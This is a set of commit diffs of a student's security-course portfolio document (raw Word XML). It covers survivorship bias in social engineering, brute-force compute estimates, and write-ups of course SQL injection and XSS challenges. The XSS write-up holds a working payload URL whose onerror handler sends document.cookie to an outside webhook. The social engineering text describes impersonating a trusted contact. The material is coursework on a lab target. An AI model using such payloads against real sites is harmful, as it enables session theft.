<commit_message>
Initial Writeup and Comments left on portfolio
</commit_message>
<xml_diff>
--- a/Portfolio/COMP6841_Week_3_z5425064.docx
+++ b/Portfolio/COMP6841_Week_3_z5425064.docx
@@ -240,12 +240,14 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Humans, Measuring</w:t>
       </w:r>
@@ -323,63 +325,23 @@
               <w:t>person’s</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> favour than in reality. </w:t>
+              <w:t xml:space="preserve"> favour </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>than in reality</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">. </w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>When applied to a</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> security context this can lead to the prediction of people’s behaviours from </w:t>
-            </w:r>
-            <w:r>
-              <w:t>their surrounding senior mentors in appealing positions to the individual (</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>e.g</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">supervisors who are working </w:t>
-            </w:r>
-            <w:r>
-              <w:t>high paying roles</w:t>
-            </w:r>
-            <w:r>
-              <w:t>/industries</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">or </w:t>
-            </w:r>
-            <w:r>
-              <w:t>relatives that have progressed in highly selective fields etc</w:t>
-            </w:r>
-            <w:r>
-              <w:t>)</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">. Due to this highly predictive bias, </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">an attacker can begin social engineering scenarios that exploit this as a vulnerability that your behaviour is in the attackers favour. For example, an attacker might infiltrate a highly admired member at a large firm within an engineering field that you have occasionally met, and then proceed to begin to send targeted ads and </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">information about this field to you for your </w:t>
-            </w:r>
-            <w:r>
-              <w:t>desire to grow. Then for them to use this professor to offer a rare opportunity that makes things easy for you .</w:t>
+              <w:t>When applied to a security context, survivorship bias can make a person’s behaviour easier to predict. For example, someone may strongly admire senior mentors, supervisors in high-paying industries, or relatives who have succeeded in selective fields. An attacker could use this pattern to create a social engineering scenario that feels personally relevant and trustworthy. They might impersonate or compromise the profile of a respected person in an engineering field, then send targeted information or opportunities that align with the victim’s career goals and fulfill the ease of progression that the victim is expecting. Because the message appears connected to someone the victim admires, the victim may be more willing to take risks they would usually question. This could help the attacker build trust, influence communication, and gradually create more opportunities to exploit the victim.</w:t>
             </w:r>
           </w:p>
-          <w:p/>
           <w:p/>
           <w:p/>
           <w:p/>
@@ -1627,6 +1589,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

</xml_diff>

<commit_message>
XSS5 and parts of XSS4
</commit_message>
<xml_diff>
--- a/Portfolio/COMP6841_Week_3_z5425064.docx
+++ b/Portfolio/COMP6841_Week_3_z5425064.docx
@@ -1313,23 +1313,7 @@
                       <w:color w:val="333333"/>
                       <w:lang w:eastAsia="en-AU"/>
                     </w:rPr>
-                    <w:t>10 *(</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
-                      <w:color w:val="333333"/>
-                      <w:lang w:eastAsia="en-AU"/>
-                    </w:rPr>
-                    <w:t>Ryzen 9/ Intel Ultra 9 + RTX2000</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
-                      <w:color w:val="333333"/>
-                      <w:lang w:eastAsia="en-AU"/>
-                    </w:rPr>
-                    <w:t>)</w:t>
+                    <w:t>10 *(Ryzen 9/ Intel Ultra 9 + RTX2000)</w:t>
                   </w:r>
                 </w:p>
                 <w:p>
@@ -1899,15 +1883,7 @@
                       <w:color w:val="333333"/>
                       <w:lang w:eastAsia="en-AU"/>
                     </w:rPr>
-                    <w:t>AMD Ryzen 5 5600x 6 Cores</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
-                      <w:color w:val="333333"/>
-                      <w:lang w:eastAsia="en-AU"/>
-                    </w:rPr>
-                    <w:t xml:space="preserve"> (4.7GHz)</w:t>
+                    <w:t>AMD Ryzen 5 5600x 6 Cores (4.7GHz)</w:t>
                   </w:r>
                 </w:p>
                 <w:p>
@@ -2814,7 +2790,13 @@
                 <w:rPr>
                   <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                 </w:rPr>
-                <m:t>24threads×5.7GHz×24hours≈</m:t>
+                <m:t>24threads×5.7GHz×24</m:t>
+              </m:r>
+              <m:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
+                </w:rPr>
+                <m:t>hours≈</m:t>
               </m:r>
               <m:f>
                 <m:fPr>
@@ -2830,13 +2812,7 @@
                     <w:rPr>
                       <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                     </w:rPr>
-                    <m:t>3,283,200,000,000</m:t>
-                  </m:r>
-                  <m:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                    </w:rPr>
-                    <m:t>bits</m:t>
+                    <m:t>3,283,200,000,000bits</m:t>
                   </m:r>
                 </m:num>
                 <m:den>
@@ -2923,13 +2899,7 @@
                       <w:rPr>
                         <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                       </w:rPr>
-                      <m:t>3,283,200,000,000</m:t>
-                    </m:r>
-                    <m:r>
-                      <w:rPr>
-                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                      </w:rPr>
-                      <m:t>bits</m:t>
+                      <m:t>3,283,200,000,000bits</m:t>
                     </m:r>
                   </m:num>
                   <m:den>
@@ -2961,25 +2931,7 @@
                       <w:rPr>
                         <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                       </w:rPr>
-                      <m:t>3</m:t>
-                    </m:r>
-                    <m:r>
-                      <w:rPr>
-                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                      </w:rPr>
-                      <m:t>0</m:t>
-                    </m:r>
-                    <m:r>
-                      <w:rPr>
-                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                      </w:rPr>
-                      <m:t>,283,200,000,000</m:t>
-                    </m:r>
-                    <m:r>
-                      <w:rPr>
-                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                      </w:rPr>
-                      <m:t>bits</m:t>
+                      <m:t>30,283,200,000,000bits</m:t>
                     </m:r>
                   </m:num>
                   <m:den>
@@ -3034,13 +2986,7 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>I found a moderately setup rack with 2x</w:t>
-            </w:r>
-            <w:r>
-              <w:t>AMD EPYC™ 9355 Processor 32-core 3.55GHz 256MB Cache (280W)</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> per unit for $75-100k so they could</w:t>
+              <w:t>I found a moderately setup rack with 2xAMD EPYC™ 9355 Processor 32-core 3.55GHz 256MB Cache (280W) per unit for $75-100k so they could</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> </w:t>
@@ -3068,13 +3014,7 @@
                   <w:rPr>
                     <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                   </w:rPr>
-                  <m:t>≈18×</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t>2×32×3.55×</m:t>
+                  <m:t>≈18×2×32×3.55×</m:t>
                 </m:r>
                 <m:sSup>
                   <m:sSupPr>
@@ -3106,19 +3046,7 @@
                   <w:rPr>
                     <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                   </w:rPr>
-                  <m:t xml:space="preserve">= </m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t>4,089,600,000,000</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t xml:space="preserve"> bits/second</m:t>
+                  <m:t>= 4,089,600,000,000 bits/second</m:t>
                 </m:r>
               </m:oMath>
             </m:oMathPara>
@@ -3133,31 +3061,7 @@
                   <w:rPr>
                     <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                   </w:rPr>
-                  <m:t>24×</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t>4,089,600,000,000</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t xml:space="preserve">= </m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t>98,150,400,000,000</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                  </w:rPr>
-                  <m:t xml:space="preserve"> per day</m:t>
+                  <m:t>24×4,089,600,000,000= 98,150,400,000,000 per day</m:t>
                 </m:r>
               </m:oMath>
             </m:oMathPara>
@@ -3236,19 +3140,7 @@
                 <w:rPr>
                   <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                 </w:rPr>
-                <m:t>5000000×</m:t>
-              </m:r>
-              <m:r>
-                <w:rPr>
-                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                </w:rPr>
-                <m:t>6×</m:t>
-              </m:r>
-              <m:r>
-                <w:rPr>
-                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
-                </w:rPr>
-                <m:t>4.7×</m:t>
+                <m:t>5000000×6×4.7×</m:t>
               </m:r>
               <m:sSup>
                 <m:sSupPr>
@@ -3630,23 +3522,7 @@
                     <w:color w:val="333333"/>
                     <w:lang w:eastAsia="en-AU"/>
                   </w:rPr>
-                  <m:t>×</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
-                    <w:color w:val="333333"/>
-                    <w:lang w:eastAsia="en-AU"/>
-                  </w:rPr>
-                  <m:t>24×3600≈</m:t>
-                </m:r>
-                <m:r>
-                  <w:rPr>
-                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
-                    <w:color w:val="333333"/>
-                    <w:lang w:eastAsia="en-AU"/>
-                  </w:rPr>
-                  <m:t>3.456×</m:t>
+                  <m:t>×24×3600≈3.456×</m:t>
                 </m:r>
                 <m:sSup>
                   <m:sSupPr>
@@ -3791,7 +3667,99 @@
             </w:r>
           </w:p>
           <w:p/>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Initially I tried to break the sql by breaking the user input here to prove that I can take control and used a sleep and this caused the gateway to fail rather than an exception being pulled so that helped me figure out the open door</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="360"/>
+            </w:pPr>
+            <w:r>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C25F438" wp14:editId="79F75FDD">
+                  <wp:extent cx="4683318" cy="1676688"/>
+                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+                  <wp:docPr id="459274888" name="Picture 1"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="459274888" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId20"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="4696926" cy="1681560"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B7076E" wp14:editId="66240762">
+                  <wp:extent cx="5498327" cy="2753275"/>
+                  <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
+                  <wp:docPr id="694017140" name="Picture 1"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="694017140" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId21"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="5501315" cy="2754771"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
           <w:p/>
           <w:p/>
           <w:p>
@@ -3834,35 +3802,43 @@
             <w:r>
               <w:t>Then I tried with console.log(1) as the on error to see if that gets sanitized or not, which it didn’t, so then I found my entry point for javascript injection</w:t>
             </w:r>
-            <w:r>
-              <w:t>:</w:t>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="4"/>
+              </w:numPr>
+            </w:pPr>
+            <w:r>
+              <w:t>I then decided to enter this url with a javascript forwarding session to a webhook I have to then retrieve the cookie from the server:</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="ListParagraph"/>
             </w:pPr>
-            <w:r>
-              <w:t>First Test</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:left="360"/>
             </w:pPr>
             <w:r>
-              <w:t>https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://webhooksite.net/7e34e9c2-187d-44b2-bf87-1538f7be3940',{method: 'POST',headers: {'Content-Type': 'application/json'},body: decodeURIComponent(document.cookie)})"&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="360"/>
-            </w:pPr>
-            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>https://xss5.comp6841.xyz/complaints#%3Cb%3EURL%20must%20be%20from%20xss5.comp6841.xyz%3C/b%3E%3Cimg%20src=x%20onerror=%22fetch('https://wh5ff260035b939895bf.free.beeceptor.com',{method: 'POST',headers: {'Content-Type': 'application/json'},body: decodeURIComponent(document.cookie)})"&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E171B9" wp14:editId="78D47ACE">
-                  <wp:extent cx="5931205" cy="4064209"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E171B9" wp14:editId="730E688E">
+                  <wp:extent cx="4801815" cy="3290323"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                   <wp:docPr id="315571931" name="Picture 1"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -3875,7 +3851,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId20"/>
+                          <a:blip r:embed="rId22"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -3883,7 +3859,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="5931205" cy="4064209"/>
+                            <a:ext cx="4810926" cy="3296566"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -3896,7 +3872,45 @@
               </w:drawing>
             </w:r>
           </w:p>
-          <w:p/>
+          <w:p>
+            <w:r>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BAC02F9" wp14:editId="50FACB58">
+                  <wp:extent cx="5943600" cy="1924050"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="1391029199" name="Picture 1"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1391029199" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId23"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="5943600" cy="1924050"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:rPr>
@@ -3939,7 +3953,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="rId21">
+      <w:hyperlink r:id="rId24">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4020,8 +4034,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId22"/>
-      <w:footerReference w:type="default" r:id="rId23"/>
+      <w:headerReference w:type="default" r:id="rId25"/>
+      <w:footerReference w:type="default" r:id="rId26"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -5251,6 +5265,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

</xml_diff>

<commit_message>
Posting Security Everywhere and the Human Biases
</commit_message>
<xml_diff>
--- a/Portfolio/COMP6841_Week_3_z5425064.docx
+++ b/Portfolio/COMP6841_Week_3_z5425064.docx
@@ -192,6 +192,7 @@
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
+            <w:highlight w:val="green"/>
           </w:rPr>
           <w:t>Security Everywhere</w:t>
         </w:r>
@@ -216,35 +217,198 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>I found this article interesting because it connects closely to the encryption principles covered this week. It discusses pseudorandom code generation, which is fundamental to many secure communication systems. These codes are designed to have high entropy and low correlation, making signals difficult to predict, intercept, or replicate. This is similar to cryptographic key generation, where randomness and unpredictability are essential for maintaining security.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>The article also explains how physical effects, such as Doppler shift, can introduce correlation into transmitted codes. This highlights that security is influenced not only by the code itself but also by the physical environment in which it operates. As a result, designers must consider randomness in areas such as frequency selection and hopping patterns, in addition to the code sequence.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Another interesting point was that some algorithms only guarantee desirable security properties for fixed code lengths rather than variable-length systems. This reflects a common challenge in security engineering, where the effectiveness of a technique often depends on the assumptions under which it was designed. Overall, the article provided a useful example of how concepts such as entropy, unpredictability, and resistance to attack apply not only to cryptography but also to communication system design.</w:t>
+              <w:t>I found this article interesting because it connects closely to the encryption principles covered this week while also highlighting an important security risk. The article discusses pseudorandom code generation, where signals are designed to have high entropy and low correlation so they are difficult to predict, intercept, or replicate. This is similar to cryptographic key generation, where randomness is essential for maintaining security.</w:t>
             </w:r>
           </w:p>
           <w:p/>
           <w:p>
             <w:r>
-              <w:t>Link:</w:t>
+              <w:t>What stood out to me was that the article explains how physical effects such as Doppler shift can introduce correlation into transmitted codes. This creates a security risk because a system that appears secure in theory may become more predictable when deployed in a real environment. The article also notes that some algorithms only guarantee desirable security properties for fixed code lengths, meaning their effectiveness depends on assumptions that may not always hold in practice.</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">This reminded me that risk in security is not limited to weaknesses in algorithms. </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">Real world </w:t>
+            </w:r>
+            <w:r>
+              <w:t>factors such as environmental conditions, implementation details, and incorrect assumptions can reduce the security of a system even when the underlying design is mathematically sound. It also affects the resources required by an attacker, as detecting and exploiting small correlations may require increasingly advanced receivers, signal processing techniques, and computational power. As a result, security often depends not only on whether a system can be broken, but also on the practical difficulty and cost of doing so.</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:drawing>
+                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5063100A" wp14:editId="60605C02">
+                  <wp:simplePos x="0" y="0"/>
+                  <wp:positionH relativeFrom="column">
+                    <wp:posOffset>2929890</wp:posOffset>
+                  </wp:positionH>
+                  <wp:positionV relativeFrom="paragraph">
+                    <wp:posOffset>0</wp:posOffset>
+                  </wp:positionV>
+                  <wp:extent cx="2744470" cy="2129155"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+                  <wp:wrapSquare wrapText="bothSides"/>
+                  <wp:docPr id="202431067" name="Picture 1"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="Picture 1"/>
+                          <pic:cNvPicPr>
+                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                          </pic:cNvPicPr>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId9" cstate="print">
+                            <a:extLst>
+                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                              </a:ext>
+                            </a:extLst>
+                          </a:blip>
+                          <a:srcRect/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr bwMode="auto">
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2744470" cy="2129155"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                          <a:noFill/>
+                          <a:ln>
+                            <a:noFill/>
+                          </a:ln>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                  <wp14:sizeRelH relativeFrom="margin">
+                    <wp14:pctWidth>0</wp14:pctWidth>
+                  </wp14:sizeRelH>
+                  <wp14:sizeRelV relativeFrom="margin">
+                    <wp14:pctHeight>0</wp14:pctHeight>
+                  </wp14:sizeRelV>
+                </wp:anchor>
+              </w:drawing>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FFAB3B7" wp14:editId="2D8BDB49">
+                  <wp:simplePos x="0" y="0"/>
+                  <wp:positionH relativeFrom="column">
+                    <wp:posOffset>1905</wp:posOffset>
+                  </wp:positionH>
+                  <wp:positionV relativeFrom="paragraph">
+                    <wp:posOffset>3810</wp:posOffset>
+                  </wp:positionV>
+                  <wp:extent cx="2912110" cy="1921510"/>
+                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
+                  <wp:wrapSquare wrapText="bothSides"/>
+                  <wp:docPr id="1663794505" name="Picture 2" descr="Understanding Quadrature Amplitude Modulation (QAM) and Its Applications -  Rahsoft"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="Picture 3" descr="Understanding Quadrature Amplitude Modulation (QAM) and Its Applications -  Rahsoft"/>
+                          <pic:cNvPicPr>
+                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                          </pic:cNvPicPr>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId10">
+                            <a:extLst>
+                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                              </a:ext>
+                            </a:extLst>
+                          </a:blip>
+                          <a:srcRect/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr bwMode="auto">
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2912110" cy="1921510"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                          <a:noFill/>
+                          <a:ln>
